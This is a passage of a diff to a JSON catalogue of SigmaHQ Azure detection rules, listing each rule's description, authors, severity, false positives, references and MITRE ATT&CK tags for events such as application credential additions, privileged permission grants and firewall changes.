"Unknown" + ], + "filename": "azure_ad_device_registration_policy_changes.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#device-registrations-and-joins-outside-policy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_device_registration_policy_changes.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1484" + ] + }, + "uuid": "9494bff8-959f-4440-bbce-fb87a208d517", + "value": "Changes to Device Registration Policy" + }, + { + "description": "Detect failed authentications from countries you do not operate out of.", + "meta": { + "author": "MikeDuddington, '@dudders1'", + 
"creation_date": "2022/07/28", + "falsepositive": [ + "If this was approved by System Administrator." + ], + "filename": "azure_ad_failed_auth_from_countries_you_do_not_operate_out_of.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_failed_auth_from_countries_you_do_not_operate_out_of.yml" + ], + "tags": [ + "attack.t1078" + ] + }, + "uuid": "28870ae4-6a13-4616-bd1a-235a7fad7458", + "value": "Failed Authentications From Countries You Do Not Operate Out Of" + }, + { + "description": "Detects guest users being invited to tenant by non-approved inviters", + "meta": { + "author": "MikeDuddington, '@dudders1'", + "creation_date": "2022/07/28", + "falsepositive": [ + "If this was approved by System Administrator." + ], + "filename": "azure_ad_guest_users_invited_to_tenant_by_non_approved_inviters.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-external-user-sign-ins", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_guest_users_invited_to_tenant_by_non_approved_inviters.yml" + ], + "tags": [ + "attack.t1078" + ] + }, + "uuid": "4ad97bf5-a514-41a4-abd3-4f3455ad4865", + "value": "Guest Users Invited To Tenant By Non Approved Inviters" + }, + { + "description": "Detect when users are authenticating without MFA being required.", + "meta": { + "author": "MikeDuddington, '@dudders1'", + "creation_date": "2022/07/27", + "falsepositive": [ + "If this was approved by System Administrator." 
+ ], + "filename": "azure_ad_only_single_factor_auth_required.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_only_single_factor_auth_required.yml" + ], + "tags": [ + "attack.t1078" + ] + }, + "uuid": "28eea407-28d7-4e42-b0be-575d5ba60b2c", + "value": "Azure AD Only Single Factor Authentication Required" + }, + { + "description": "Monitor and alert for sign-ins where the device was non-compliant.", + "meta": { + "author": "Michael Epping, '@mepples21'", + "creation_date": "2022/06/28", + "falsepositive": [ + "Unknown" + ], + "filename": "azure_ad_sign_ins_from_noncompliant_devices.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#non-compliant-device-sign-in", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_sign_ins_from_noncompliant_devices.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1078" + ] + }, + "uuid": "4f77e1d7-3982-4ee0-8489-abf2d6b75284", + "value": "Sign-ins from Non-Compliant Devices" + }, + { + "description": "Monitor and alert for Sign-ins by unknown devices from non-Trusted locations.", + "meta": { + "author": "Michael Epping, '@mepples21'", + "creation_date": "2022/06/28", + "falsepositive": [ + "Unknown" + ], + "filename": "azure_ad_sign_ins_from_unknown_devices.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#non-compliant-device-sign-in", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_sign_ins_from_unknown_devices.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1078" + ] + }, + "uuid": "4d136857-6a1a-432a-82fc-5dd497ee5e7c", + "value": "Sign-ins by Unknown Devices" + }, + { + "description": "Monitor and alert for users added to device admin roles.", + "meta": { + "author": "Michael Epping, '@mepples21'", + "creation_date": "2022/06/28", + "falsepositive": [ + "Unknown" + ], + "filename": "azure_ad_users_added_to_device_admin_roles.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#device-administrator-roles", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_users_added_to_device_admin_roles.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1078" + ] + }, + "uuid": "11c767ae-500b-423b-bae3-b234450736ed", + "value": "Users Added to Global or Device Admin Roles" + }, + { + "description": "User Added to an Administrator's Azure AD Role", + "meta": { + "author": "Raphaël CALVET, @MetallicHack", + "creation_date": "2021/10/04", + "falsepositive": [ + "PIM (Privileged Identity Management) generates this event each time 'eligible role' is enabled." 
+ ], + "filename": "azure_ad_user_added_to_admin_role.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://attack.mitre.org/techniques/T1098/003/", + "https://m365internals.com/2021/07/13/what-ive-learned-from-doing-a-year-of-cloud-forensics-in-azure-ad/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_user_added_to_admin_role.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098.003" + ] + }, + "uuid": "ebbeb024-5b1d-4e16-9c0c-917f86c708a7", + "value": "User Added to an Administrator's Azure AD Role" + }, + { + "description": "Identifies when a application is deleted in Azure.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/03", + "falsepositive": [ + "Application being deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Application deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "azure_application_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_application_deleted.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "410d2a41-1e6d-452f-85e5-abdd8257a823", + "value": "Azure Application Deleted" + }, + { + "description": "Identifies when a application gateway is modified or deleted.", + "meta": { + "author": "Austin Songer", + "creation_date": "2021/08/16", + "falsepositive": [ + "Application gateway being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Application gateway modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "azure_application_gateway_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_application_gateway_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "ad87d14e-7599-4633-ba81-aeb60cfe8cd6", + "value": "Azure Application Gateway Modified or Deleted" + }, + { + "description": "Identifies when a application security group is modified or deleted.", + "meta": { + "author": "Austin Songer", + "creation_date": "2021/08/16", + "falsepositive": [ + "Application security group being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Application security group modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "azure_application_security_group_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_application_security_group_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "835747f1-9329-40b5-9cc3-97d465754ce6", + "value": "Azure Application Security Group Modified or Deleted" + }, + { + "description": "Detects when a configuration change is made to an applications AppID URI.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", + "creation_date": "2022/06/02", + "falsepositive": [ + "When and administrator is making legitimate AppID URI configuration changes to an application. This should be a planned event." + ], + "filename": "azure_app_appid_uri_changes.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#appid-uri-added-modified-or-removed", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_appid_uri_changes.yml" + ], + "tags": [ + "attack.t1528", + "attack.persistence", + "attack.credential_access" + ] + }, + "uuid": "1b45b0d1-773f-4f23-aedc-814b759563b1", + "value": "Application AppID Uri Configuration Changes" + }, + { + "description": "Detects when a new credential is added to an existing application. 
Any additional credentials added outside of expected processes could be a malicious actor using those credentials.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", + "creation_date": "2022/05/26", + "falsepositive": [ + "When credentials are added/removed as part of the normal working hours/workflows" + ], + "filename": "azure_app_credential_added.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-credentials", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_credential_added.yml" + ], + "tags": [ + "attack.t1098", + "attack.persistence" + ] + }, + "uuid": "cbb67ecc-fb70-4467-9350-c910bdf7c628", + "value": "Added Credentials to Existing Application" + }, + { + "description": "Identifies when a application credential is modified.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/02", + "falsepositive": [ + "Application credential added may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Application credential added from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "azure_app_credential_modification.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://www.cloud-architekt.net/auditing-of-msi-and-service-principals/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_credential_modification.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "cdeef967-f9a1-4375-90ee-6978c5f23974", + "value": "Azure Application Credential Modified" + }, + { + "description": "Detects when highly privileged delegated permissions are granted on behalf of all users", + "meta": { + "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", + "creation_date": "2022/07/28", + "falsepositive": [ + "When the permission is legitimately needed for the app" + ], + "filename": "azure_app_delegated_permissions_all_users.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_delegated_permissions_all_users.yml" + ], + "tags": [ + "attack.privilege_escalation" + ] + }, + "uuid": "a6355fbe-f36f-45d8-8efc-ab42465cbc52", + "value": "Delegated Permissions Granted For All Users" + }, + { + "description": "Device code flow is an OAuth 2.0 protocol flow specifically for input constrained devices and is not used in all environments.\nIf this type of flow is seen in the environment and not being used in an input constrained device scenario, further investigation is warranted.\nThis can be a misconfigured application or potentially something malicious.\n", + "meta": { + "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", + "creation_date": "2022/06/01", + "falsepositive": [ + "Applications that are input 
constrained will need to use device code flow and are valid authentications." + ], + "filename": "azure_app_device_code_authentication.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-authentication-flows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_device_code_authentication.yml" + ], + "tags": [ + "attack.t1078", + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.initial_access" + ] + }, + "uuid": "248649b7-d64f-46f0-9fb2-a52774166fb5", + "value": "Application Using Device Code Authentication Flow" + }, + { + "description": "Detects when an end user consents to an application", + "meta": { + "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", + "creation_date": "2022/07/28", + "falsepositive": [ + "Unknown" + ], + "filename": "azure_app_end_user_consent.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#end-user-consent", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_end_user_consent.yml" + ], + "tags": [ + "attack.privilege_escalation" + ] + }, + "uuid": "9b2cc4c4-2ad4-416d-8e8e-ee6aa6f5035a", + "value": "End User Consent" + }, + { + "description": "Detects when end user consent is blocked due to risk-based consent.", + "meta": { + "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", + "creation_date": "2022/07/10", + "falsepositive": [ + "Unknown" + ], + "filename": "azure_app_end_user_consent_blocked.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + 
"https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#end-user-stopped-due-to-risk-based-consent", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_end_user_consent_blocked.yml" + ], + "tags": [ + "attack.privilege_escalation" + ] + }, + "uuid": "7091372f-623c-4293-bc37-20c32b3492be", + "value": "End User Consent Blocked" + }, + { + "description": "Detects when a new owner is added to an application. This gives that account privileges to make modifications and configuration changes to the application.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", + "creation_date": "2022/06/02", + "falsepositive": [ + "When a new application owner is added by an administrator" + ], + "filename": "azure_app_owner_added.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#new-owner", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_owner_added.yml" + ], + "tags": [ + "attack.t1528", + "attack.persistence", + "attack.credential_access", + "attack.defense_evasion" + ] + }, + "uuid": "74298991-9fc4-460e-a92e-511aa60baec1", + "value": "Added Owner To Application" + }, + { + "description": "Detects when app permissions (app roles) for other APIs are granted", + "meta": { + "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", + "creation_date": "2022/07/28", + "falsepositive": [ + "When the permission is legitimately needed for the app" + ], + "filename": "azure_app_permissions_for_api.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + 
"https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_permissions_for_api.yml" + ], + "tags": [ + "attack.privilege_escalation" + ] + }, + "uuid": "ba2a7c80-027b-460f-92e2-57d113897dbc", + "value": "App Permissions Granted For Other APIs" + }, + { + "description": "Detects when an application is granted delegated or app role permissions for Microsoft Graph, Exchange, Sharepoint, or Azure AD", + "meta": { + "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", + "creation_date": "2022/07/10", + "falsepositive": [ + "When the permission is legitimately needed for the app" + ], + "filename": "azure_app_permissions_msft.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_permissions_msft.yml" + ], + "tags": [ + "attack.privilege_escalation" + ] + }, + "uuid": "c1d147ae-a951-48e5-8b41-dcd0170c7213", + "value": "App Granted Microsoft Permissions" + }, + { + "description": "Detects when administrator grants either application permissions (app roles) or highly privileged delegated permissions", + "meta": { + "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", + "creation_date": "2022/07/28", + "falsepositive": [ + "When the permission is legitimately needed for the app" + ], + "filename": "azure_app_privileged_permissions.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "microsoft365portal", + "refs": [ + 
"https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_privileged_permissions.yml" + ], + "tags": [ + "attack.privilege_escalation" + ] + }, + "uuid": "5aecf3d5-f8a0-48e7-99be-3a759df7358f", + "value": "App Granted Privileged Delegated Or App Permissions" + }, + { + "description": "Detects when an app is assigned Azure AD roles, such as global adminsitrator, or Azure RBAC roles, such as subscription owner.", + "meta": { + "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", + "creation_date": "2022/07/19", + "falsepositive": [ + "When the permission is legitimately needed for the app" + ], + "filename": "azure_app_role_added.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#service-principal-assigned-to-a-role", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_role_added.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "b04934b2-0a68-4845-8a19-bdfed3a68a7a", + "value": "App Role Added" + }, + { + "description": "Resource owner password credentials (ROPC) should be avoided if at all possible as this requires the user to expose their current password credentials to the application directly.\nThe application then uses those credentials to authenticate the user against the identity provider.\n", + "meta": { + "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", + "creation_date": "2022/06/01", + "falsepositive": [ + "Applications that are being used as part of automated testing or a legacy application that cannot use any other modern authentication flow" + ], + "filename": "azure_app_ropc_authentication.yml", + "level": "medium", + 
"logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-authentication-flows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_ropc_authentication.yml" + ], + "tags": [ + "attack.t1078", + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.initial_access" + ] + }, + "uuid": "55695bc0-c8cf-461f-a379-2535f563c854", + "value": "Applications That Are Using ROPC Authentication Flow" + }, + { + "description": "Detects when a configuration change is made to an applications URI.\nURIs for domain names that no longer exist (dangling URIs), not using HTTPS, wildcards at the end of the domain, URIs that are no unique to that app, or URIs that point to domains you do not control should be investigated.\n", + "meta": { + "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", + "creation_date": "2022/06/02", + "falsepositive": [ + "When and administrator is making legitimate URI configuration changes to an application. This should be a planned event." 
+ ], + "filename": "azure_app_uri_modifications.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-configuration-changes", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_uri_modifications.yml" + ], + "tags": [ + "attack.t1528", + "attack.persistence", + "attack.credential_access" + ] + }, + "uuid": "0055ad1f-be85-4798-83cf-a6da17c993b3", + "value": "Application URI Configuration Changes" + }, + { + "description": "Detects when an account is disabled or blocked for sign in but tried to log in", + "meta": { + "author": "Yochana Henderson, '@Yochana-H'", + "creation_date": "2022/06/17", + "falsepositive": [ + "Account disabled or blocked in error", + "Automation account has been blocked or disabled" + ], + "filename": "azure_blocked_account_attempt.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_blocked_account_attempt.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110" + ] + }, + "uuid": "4afac85c-224a-4dd7-b1af-8da40e1c60bd", + "value": "Account Disabled or Blocked for Sign in Attempts" + }, + { + "description": "Change to authentication method could be an indicated of an attacker adding an auth method to the account so they can have continued access.", + "meta": { + "author": "AlertIQ", + "creation_date": "2021/10/10", + "falsepositive": [ + "Unknown" + ], + "filename": "azure_change_to_authentication_method.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + 
"https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_change_to_authentication_method.yml" + ], + "tags": [ + "attack.credential_access" + ] + }, + "uuid": "4d78a000-ab52-4564-88a5-7ab5242b20c7", + "value": "Change to Authentication Method" + }, + { + "description": "Define a baseline threshold for failed sign-ins due to Conditional Access failures", + "meta": { + "author": "Yochana Henderson, '@Yochana-H'", + "creation_date": "2022/06/01", + "falsepositive": [ + "Service Account misconfigured", + "Misconfigured Systems", + "Vulnerability Scanners" + ], + "filename": "azure_conditional_access_failure.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_conditional_access_failure.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110" + ] + }, + "uuid": "b4a6d707-9430-4f5f-af68-0337f52d5c42", + "value": "Sign-in Failure Due to Conditional Access Requirements Not Met" + }, + { + "description": "Detects when a Container Registry is created or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/07", + "falsepositive": [ + "Container Registry being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Container Registry created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "azure_container_registry_created_or_deleted.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", + "https://attack.mitre.org/matrices/enterprise/cloud/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_container_registry_created_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "93e0ef48-37c8-49ed-a02c-038aab23628e", + "value": "Azure Container Registry Created or Deleted" + }, + { + "description": "Number of VM creations or deployment activities occur in Azure via the azureactivity log.", + "meta": { + "author": "sawwinnnaung", + "creation_date": "2020/05/07", + "falsepositive": [ + "Valid change" + ], + "filename": "azure_creating_number_of_resources_detection.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/Creating_Anomalous_Number_Of_Resources_detection.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_creating_number_of_resources_detection.yml" + ], + "tags": [ + "attack.t1098" + ] + }, + "uuid": "d2d901db-7a75-45a1-bc39-0cbf00812192", + "value": "Number Of Resource Creation Or Deployment Activities" + }, + { + "description": "Identifies when a device in azure is no longer managed or compliant", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/03", + "falsepositive": [ + 
"Administrator may have forgotten to review the device." + ], + "filename": "azure_device_no_longer_managed_or_compliant.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#core-directory", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_device_no_longer_managed_or_compliant.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "542b9912-c01f-4e3f-89a8-014c48cdca7d", + "value": "Azure Device No Longer Managed or Compliant" + }, + { + "description": "Identifies when a device or device configuration in azure is modified or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/03", + "falsepositive": [ + "Device or device configuration being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Device or device configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "azure_device_or_configuration_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#core-directory", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_device_or_configuration_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "46530378-f9db-4af9-a9e5-889c177d3881", + "value": "Azure Device or Configuration Modified or Deleted" + }, + { + "description": "Identifies when DNS zone is modified or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/08", + "falsepositive": [ + "DNS zone modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "DNS zone modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "azure_dns_zone_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_dns_zone_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "af6925b0-8826-47f1-9324-337507a0babd", + "value": "Azure DNS Zone Modified or Deleted" + }, + { + "description": "Identifies when an user or application modified the federation settings on the domain.", + "meta": { + "author": "Austin Songer", + "creation_date": "2021/09/06", + "falsepositive": [ + "Federation Settings being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Federation Settings modified from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_federation_modified.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://attack.mitre.org/techniques/T1078", + "https://docs.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-monitor-federation-changes", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_federation_modified.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078" + ] + }, + "uuid": "352a54e1-74ba-4929-9d47-8193d67aba1e", + "value": "Azure Domain Federation Settings Modified" + }, + { + "description": "Identifies when a firewall is created, modified, or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/08", + "falsepositive": [ + "Firewall being modified or deleted may be performed by a system administrator. 
Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Firewall modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_firewall_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_firewall_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "512cf937-ea9b-4332-939c-4c2c94baadcd", + "value": "Azure Firewall Modified or Deleted" + }, + { + "description": "Identifies when Rule Collections (Application, NAT, and Network) is being modified or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/08", + "falsepositive": [ + "Rule Collections (Application, NAT, and Network) being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Rule Collections (Application, NAT, and Network) modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "azure_firewall_rule_collection_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_firewall_rule_collection_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "025c9fe7-db72-49f9-af0d-31341dd7dd57", + "value": "Azure Firewall Rule Collection Modified or Deleted" + }, + { + "description": "Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used.", + "meta": { + "author": "sawwinnnaung", + "creation_date": "2020/05/07", + "falsepositive": [ + "Valid change" + ], + "filename": "azure_granting_permission_detection.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/Granting_Permissions_To_Account_detection.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_granting_permission_detection.yml" + ], + "tags": [ + "attack.t1098" + ] + }, + "uuid": "a622fcd2-4b5a-436a-b8a2-a4171161833c", + "value": "Granting Of Permissions To An Account" + }, + { + "description": "Monitor and alert on group membership additions of groups that have CA policy modification access", + "meta": { + "author": "Mark Morowczynski '@markmorow', Thomas Detzner '@tdetzner'", + 